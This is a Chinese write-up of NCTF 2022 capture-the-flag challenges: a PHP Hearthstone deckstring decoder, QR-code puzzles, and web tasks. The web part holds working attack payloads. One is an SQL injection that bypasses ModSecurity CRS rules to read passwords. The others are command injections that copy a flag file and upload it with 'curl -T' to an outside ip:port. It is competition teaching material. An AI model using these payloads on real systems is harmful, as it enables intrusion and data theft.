2022 NCTF

MISC

炉边聚会

卡组代码是 Base64 编码的字节串,exp


$deckstring = "AAEDAZoFKIwGngXIBrwFzgnQBfIHygf0CIgJkAi+BogJ1gjMCPIHtgeeBeAD6AfyB7YHvgbgA+AD4AO2B7wFkgnMCMwI+ga2B/QImgi6BJAIiAn2BOIJAAA=";
#这是⼀个⾮常有趣的萨满卡组
$binary = base64_decode($deckstring);
$hex = bin2hex($binary);
#对于这个卡组,$hex="00010101fd06000fce069707cc08e20cff0fc814e616b6ac02aeb002a5be02f8bf02f9bf02a2cd02f8d002a6ef0200"
$arr = str_split($hex, 2);
$arr = array_map("hexdec", $arr);
function read_varint(&$data) {
	$shift = 0;
	$result = 0;
	do {
		$c = array_shift($data);
		$result |= ($c & 0x7f) << $shift;
		$shift += 7;
	}
	while ($c & 0x80);
	return $result;
}
function parse_deck($data) {
	$reserve = read_varint($data);
	if ($reserve != 0) {
		printf("Invalid deckstring");
		die;
	}
	$version = read_varint($data);
	if ($version != 1) {
		printf("Unsupported deckstring version %s", $version);
		die;
	}
	$format = read_varint($data);
	$heroes = [];
	$num_heroes = read_varint($data);
	for ($i = 0; $i < $num_heroes; $i++) {
		$heroes[] = read_varint($data);
	}
	$cards = [];
	$num_cards_x1 = read_varint($data);
	for ($i = 0; $i < $num_cards_x1; $i++) {
		$card_id = read_varint($data);
		$cards[] = [$card_id, 1];
	}
	$num_cards_x2 = read_varint($data);
	for ($i = 0; $i < $num_cards_x2; $i++) {
		$card_id = read_varint($data);
		$cards[] = [$card_id, 2];
	}
	$num_cards_xn = read_varint($data);
	for ($i = 0; $i < $num_cards_xn; $i++) {
		$card_id = read_varint($data);
		$count = read_varint($data);
		$cards[] = [$card_id, $count];
	}
	return [$cards, $heroes, $format];
	}
print_r(parse_deck($arr)[0]);

运行得到

Array
(
    [0] => Array
        (
            [0] => 780
            [1] => 1
        )

    [1] => Array
        (
            [0] => 670
            [1] => 1
        )

    [2] => Array
        (
            [0] => 840
            [1] => 1
        )

    [3] => Array
        (
            [0] => 700
            [1] => 1
        )

    [4] => Array
        (
            [0] => 1230
            [1] => 1
        )

    [5] => Array
        (
            [0] => 720
            [1] => 1
        )

    [6] => Array
        (
            [0] => 1010
            [1] => 1
        )

    [7] => Array
        (
            [0] => 970
            [1] => 1
        )

    [8] => Array
        (
            [0] => 1140
            [1] => 1
        )

    [9] => Array
        (
            [0] => 1160
            [1] => 1
        )

    [10] => Array
        (
            [0] => 1040
            [1] => 1
        )

    [11] => Array
        (
            [0] => 830
            [1] => 1
        )

    [12] => Array
        (
            [0] => 1160
            [1] => 1
        )

    [13] => Array
        (
            [0] => 1110
            [1] => 1
        )

    [14] => Array
        (
            [0] => 1100
            [1] => 1
        )

    [15] => Array
        (
            [0] => 1010
            [1] => 1
        )

    [16] => Array
        (
            [0] => 950
            [1] => 1
        )

    [17] => Array
        (
            [0] => 670
            [1] => 1
        )

    [18] => Array
        (
            [0] => 480
            [1] => 1
        )

    [19] => Array
        (
            [0] => 1000
            [1] => 1
        )

    [20] => Array
        (
            [0] => 1010
            [1] => 1
        )

    [21] => Array
        (
            [0] => 950
            [1] => 1
        )

    [22] => Array
        (
            [0] => 830
            [1] => 1
        )

    [23] => Array
        (
            [0] => 480
            [1] => 1
        )

    [24] => Array
        (
            [0] => 480
            [1] => 1
        )

    [25] => Array
        (
            [0] => 480
            [1] => 1
        )

    [26] => Array
        (
            [0] => 950
            [1] => 1
        )

    [27] => Array
        (
            [0] => 700
            [1] => 1
        )

    [28] => Array
        (
            [0] => 1170
            [1] => 1
        )

    [29] => Array
        (
            [0] => 1100
            [1] => 1
        )

    [30] => Array
        (
            [0] => 1100
            [1] => 1
        )

    [31] => Array
        (
            [0] => 890
            [1] => 1
        )

    [32] => Array
        (
            [0] => 950
            [1] => 1
        )

    [33] => Array
        (
            [0] => 1140
            [1] => 1
        )

    [34] => Array
        (
            [0] => 1050
            [1] => 1
        )

    [35] => Array
        (
            [0] => 570
            [1] => 1
        )

    [36] => Array
        (
            [0] => 1040
            [1] => 1
        )

    [37] => Array
        (
            [0] => 1160
            [1] => 1
        )

    [38] => Array
        (
            [0] => 630
            [1] => 1
        )

    [39] => Array
        (
            [0] => 1250
            [1] => 1
        )

)
[Finished in 43ms]

将这些[0]的内容除以10.就是ascll码,转换字符串就是flag
在这里插入图片描述
在这里插入图片描述

qrssssssss

二维码批量识别 https://tl.beer/parseqrcode.html

按时间递增排序 批量处理得到flag

qrssssssss_revenge

HINT:LMQH,利用QR RESEARCH

web

Ezbypass

cve:
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1727

Payload:

?id=@.:=right(right((select hex(password) from users.info where id =1 limit 0,1),1111),1111) union%23%0adistinctrow%0bselect@.
2022 NCTF_第1张图片

Calc:

DasCTF三月赛类似,加了几个符号的过滤
https://xiaolong22333.top/index.php/archives/140/
在tmp/log.txt发现⾥⾯有根⽬录,flag名字 Th1s_is__F1114g
通过cp 和curl

	/calc?num='''1' cp /T* /1.txt '3'''
	/calc?num='''1' curl -T /1.txt ip:port '3'''
	```
	

你可能感兴趣的:(CTF,python)